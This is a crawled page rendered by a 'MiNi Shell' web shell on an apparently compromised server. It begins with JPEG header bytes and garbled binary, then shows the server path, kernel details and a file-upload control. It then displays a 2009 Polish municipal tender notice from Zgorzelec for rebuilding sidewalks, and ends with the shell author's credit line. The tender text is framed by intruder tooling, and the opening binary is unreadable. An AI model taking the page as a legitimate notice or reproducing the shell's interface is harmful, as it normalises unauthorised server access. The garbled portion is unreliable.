JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/119421-N-2009.html

<p class="kh_header"><b>Zgorzelec: Modernizacja nawierzchni chodnika ul. Poniatowskiego od Barbary do ul. Traugutta. Modernizacja chodników ul. Poniatowskiego.</b><br>
<b>Numer ogłoszenia: 119421 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja nawierzchni chodnika ul. Poniatowskiego od Barbary do ul. Traugutta. Modernizacja chodników ul. Poniatowskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przebudowa nawierzchni chodników i miejsc postojowych przy ul. Poniatowskiego - rejon były restauracji Barbara, wzdłuż zaplecza handlowo-usługowego oraz przy budynkach mieszkalnych wielorodzinnych zlokalizowanych przy ul. Poniatowskiego 18,20,21,22 i przy boisku sportowym. Nową nawierzchnię chodników i miejsc postojowych zaprojektowano z kostki betonowej brukowej na podbudowie z kruszywa łamanego w obramowaniu z krawężników oraz obrzeży betonowych.


2.	Zakres przedmiotu zamówienia w ramach modernizacji nawierzchni chodnika    ul. Poniatowskiego od Barbary do ul. Traugutta obejmuje: 

2.1	  Roboty przygotowawcze:

1.	wycinka drzewa poprzez karczowanie,
2.	rozbiórka elementów dróg. Rozbiórka ścieku przykrawężnikowego z kostki kamiennej nieregularnej - trzy rzędy (odzysk kostki do przełożenia),
3.	rozbiórka elementów dróg i ulic. Rozbiórka obrzeży betonowych 8x30cm,
4.	rozebranie elementów dróg i ulic. Rozbiórka krawężników betonowych 15x30cm,
5.	rozbiórka elementów dróg. Rozbiórka płyt betonowych chodnikowych o wym. 35x35x5cm,
6.	rozbiórka elementów dróg. Rozbiórka poręczy ochronnych,
7.	rozbiórka elementów dróg. Rozbiórka nawierzchni betonowej (w tym terenowe schody blokowe betonowe),
8.	wywóz gruzu betonowego z rozbiórki krawężników betonowych, obrzeży betonowych, płyt chodnikowych, betonu na wysypisko,
9.	roboty ziemne - korytowanie pod konstrukcje nawierzchni chodników, miejsc postojowych, schody oraz ławy betonowe krawężników i obrzeży.

2.2   Elementy ulic: 

1.	krawężniki betonowe wystające, obniżone - najazdowe na miejscach postojowych - 15x30cm z wykonaniem ław betonowych z betonu,
2.	 obrzeża betonowe o wymiarach 8x30cm na ławie betonowej z betonu,
3.	 chodniki - kostka szara, miejsca postojowe - kostka czerwona/ nawierzchni z kostki betonowej brukowej grub. 8 cm na podsypce piaskowej  z wypełnieniem spoin piaskiem,
4.	 schody terenowe z obrzeży betonowych 8x30cm na ławie betonowej i podłożu z betonu C12/15 z wypełnieniem kostką betonową brukową 8x30cm na podsypce cementowo-piaskowej,

2.3    Podbudowy:

1.	profilowanie i zagęszczanie podłoża gruntowego po korytowaniu pod warstwy konstrukcyjne,
2.	podbudowa z kruszywa łamanego 0-63mm, grub. 20 cm, stabilizowana mechanicznie (miejsca postojowe),
3.	podbudowa z kruszywa łamanego 0-31,5mm, grub. 10 cm, stabilizowana mechanicznie (chodniki),
4.	warstwa odcinająca z piasku grub. 10 cm, stabilizowana mechanicznie.

2.4     Roboty wykończeniowe:

1.	 ścieki przykrawężnikowe z betonowej kostki brukowej 10x20cm na podsypce cementowo-piaskowej, 2 rzędy kostki betonowej brukowej z wypełnieniem spoin zaprawą cementową,
2.	zabudowa studzienki ściekowej z wpustem na górnym chodniku z odprowadzeniem do ścieku przykrawężnikowego dolnego parkingu,
3.	ściek z kostki kamiennej9/11cm - trzy rzędy, z ławą betonową z betonu,
4.	 zabudowa palisady betonowej przewiązkowej,
5.	 odtworzenie trawników poprzez zakładanie nowych trawników,
6.	 regulacja pionowa włazów kanałowych, wpustów ulicznych i nakryw studni telekomunikacyjnych,
7.	remont cząstkowy nawierzchni bitumicznej wzdłuż przebudowanego ścieku z kostki kamiennej.

3.	Zakres przedmiotu zamówienia w ramach modernizacji chodnika ul. Poniatowskiego obejmuje: 

3.1   Roboty przygotowawcze:

1.	rozbiórka elementów dróg i ulic. Rozbiórka obrzeży betonowych 8x30cm,
2.	rozebranie elementów dróg i ulic. Rozbiórka krawężników betonowych 15x30cm,
3.	rozbiórka elementów dróg. Rozbiórka płyt betonowych chodnikowych o wym. 35x35x5cm,
4.	rozbiórka elementów dróg. Rozbiórka ogrodzeń: z rur i kształtowników stalowych (niskich) terenów zielonych,
5.	rozbiórka elementów dróg. Rozbiórka nawierzchni betonowej,
6.	wywóz gruzu betonowego z rozbiórki krawężników betonowych, obrzeży betonowych, płyt chodnikowych, betonu, bitumu (podlega utylizacji) na wysypisko,
7.	roboty ziemne - korytowanie pod konstrukcje nawierzchni chodników, dojazdu oraz ławy betonowe krawężników i obrzeży.


3.2    Elementy ulic:

1.	krawężniki betonowe wystające, obniżone na zjazdach - 15x30cm  z wykonaniem ław betonowych z betonu,
2.	obrzeża betonowe o wymiarach 8x30cm na ławie betonowej z betonu,
3.	nawierzchnia mineralna HanseGrand - warstwa górna  z HG, warstwa dolna dynamiczna HM,
4.	 chodniki, place manewrowo-postojowe - kostka szara, przedłużenie drogi dojazdowej, miejsca postojowe - nawierzchnia z kostki betonowej brukowej na podsypce piaskowej              z wypełnieniem spoin piaskiem.

3.3    Podbudowy:

1.	profilowanie i zagęszczanie podłoża gruntowego po korytowaniu pod warstwy konstrukcyjne,
2.	podbudowa z kruszywa łamanego 0-31,5mm, grub. 15 cm, stabilizowana mechanicznie (wydłużenie dojazdu oraz miejsca postojowe),
3.	podbudowa z kruszywa łamanego 0-31,5mm, grub. 10 cm, stabilizowana mechanicznie (chodniki).

3.4	Roboty wykończeniowe:

1.	schody terenowe z obrzeży betonowych na ławie betonowej i podłożu z betonu z wypełnieniem kostką brukową betonową na podsypce cementowo-piaskowej,
2.	odtworzenie trawników poprzez zakładanie nowych trawników,
3.	remont cząstkowy nawierzchni bitumicznej wzdłuż przebudowanego krawężnika kamiennego,
4.	regulacja pionowa włazów kanałowych, skrzynek zaworowych, wpustów ulicznych  i nakryw studni telekomunikacyjnych.

4.	Szczegółowy opis przedmiotu zamówienia określony został dokumentacją projektową stanowiącą Załącznik Nr 1 do SIWZ.

5.	Wymagany okres gwarancji:
Zamawiający na wykonany przedmiot zamówienia wymaga minimum 36 miesięcznego okresu gwarancji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca wniesie wadium w wysokości 7.780,00 zł przed upływem terminu  składania ofert, który został określony w pkt. 16.1 SIWZ.

2.	W zależności od woli Wykonawcy wadium może być wnoszone w formach:

a.	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art.. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 35124012971111000025654013 w banku PeKaO S.A. I O/Zgorzelec.

Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu (wpłaty)  
załączona do oferty z dopiskiem Wadium do postępowania nr WZP.341-43/09.
		
4.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

5.	Zamawiający zwróci niezwłocznie wadium, jeżeli:
1.	upłynął termin związania ofertą,

2.	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,

3.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

6.	Z zastrzeżeniem pkt. 6 a, Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
1.	który wycofał ofertę przed upływem terminu składania ofert,

2.	który został wykluczony z postępowania,

3.	którego oferta została odrzucona.

     6 a   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

7.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
4.	w przypadku określonym w pkt. 6 a .

9.  W przypadku wniesienia wadium w formach  wymienionych w pkt. 2 ppkt od b do e z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym  w pkt. 6 a . 

10. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione  prawidłowo.

11.	Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter nieodwołalny i bezwarunkowy - równoważny pieniądzu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie Zamówienia mogą  ubiegać się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, czyli:

1 	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
                
Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści:

a.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności  gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert,

b.	zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt  4-8  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed terminem składania ofert,

c.	zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 a i c składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio dla pkt. 1 a - że nie otwarto jego likwidacji ani nie ogłoszono upadłości, dla pkt. 1 c - nie orzeczono wobec niego zakazu ubiegania się o zamówienie wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W zakresie dokumentu określonego w pkt. 1 b Wykonawca składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2 	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania lub przestawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia określonego w niniejszym postępowaniu  tj.:

a.	wykażą zrealizowane roboty budowlane, w okresie ostatnich pięciu lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, odpowiadających swoim rodzajem            i wartością robotom budowlanym stanowiącym przedmiot zamówienia. Zamawiający wymaga, aby wykaz zawierał:

1.	dwie roboty budowlane polegające na budowie lub przebudowie dróg z kostki brukowej, o łącznej wartości nie mniejszej niż 100 tys. zł. z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie /wykaz został określony formularzem Nr 3 do SIWZ/,

b.	wykażą, iż dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, tj. posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi. Wykonawca w tym zakresie musi wykazać, iż:  

1.	 dysponuje przynajmniej jedną osobą posiadającą prawo do wykonywania samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi w specjalności drogowej, wpisaną na listę członków samorządu zawodowego - Okręgowej Izby Inżynierów,
W celu potwierdzenia opisanego wyżej warunku należy przedstawić  dokument potwierdzający uprawnienia wskazanej przez Wykonawcę osoby w ww. specjalności.
 Osobę o ww. specjalności należy wykazać w formularzu Nr 4 do SIWZ.
 Zamawiający  najpóźniej w dniu podpisania  umowy  będzie żądał przedstawienia zaświadczenia z właściwej Izby Samorządu Zawodowego dla w/w osoby, potwierdzającego jej przynależność do Izby, aktualnego na dzień  podpisania umowy.

2.	w przypadku kiedy Wykonawca w wykazie, o którym mowa w  pkt. b 1 wskaże osobę, którą będzie dysponował - do przedmiotowego wykazu musi załączyć pisemne zobowiązania innych podmiotów do udostępnienia osoby zdolnej do wykonania zamówienia.
                                                   
3.	Nie podlegają wykluczeniu z postępowania o zamówienie publiczne zgodnie z art.24 ust.  1 i   2 ustawy Prawo zamówień publicznych.

4.	Złożą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie  
       Zamówienia  /oświadczenie zostało określone formularzem Nr 2 do SIWZ/

Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie załączonych do oferty dokumentów, o których mowa w pkt. 10  SIWZ  metodą spełnia /  nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga złożenia dokumentów potwierdzających spełnianie warunków udziału  w postępowaniu, zgodnie z treścią rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. 
W celu:

1. potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej 
    działalności  lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 
     ustawy z  dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej 
     ustawą, Zamawiający żąda  następujących dokumentów:

a.	Oryginału lub kopii aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,                  

b.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust. 1  pkt. 4-8 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert, 

c.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert,

2	potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, Zamawiający  żąda następujących dokumentów:

a.	Wypełnionego formularza wykazu zrealizowanych robót budowlanych zgodnie  z zapisem w pkt. 9.2 a SIWZ - formularz Nr 3  do SIWZ. Wykaz musi zawierać: nazwę i lokalizację budowy, opis wykonanych robót wraz z ich zakresem, termin rozpoczęcia i zakończenia robót, wartość brutto zrealizowanych robót, nazwę, adres i telefon Zamawiającego.

b.	Wykazu osób  zgodnie z zapisem w pkt. 9.2 b  SIWZ - formularz Nr 4 do SIWZ.

c.	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 9.2 b SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował

3.	Oświadczenie Wykonawcy, że posiada niezbędny potencjał finansowy, kadrowy,
      	techniczny oraz doświadczenie niezbędne do realizacji zamówienia oraz, że nie podlega 	wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych złożone na druku stanowiącym formularz nr 2  do SIWZ . 

W przypadku złożenia oferty wspólnej, dokumenty o których mowa w pkt. 1 od a do c  składa każdy  z wykonawców. 

Wymagania dotyczące oferty

Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia  oferty  zgodnie z art. 89 ust. 1 pkt. 2 , z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy PZP:

1)	wypełniony  formularz ofertowy - formularz Nr 1,

2) wypełniony formularz oświadczenia wskazującego część zamówienia, której    wykonawca powierzy podwykonawcom - formularz nr  5  do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 6,pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 10:00, miejsce: w siedzibie  Zamawiającego tj.:
Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com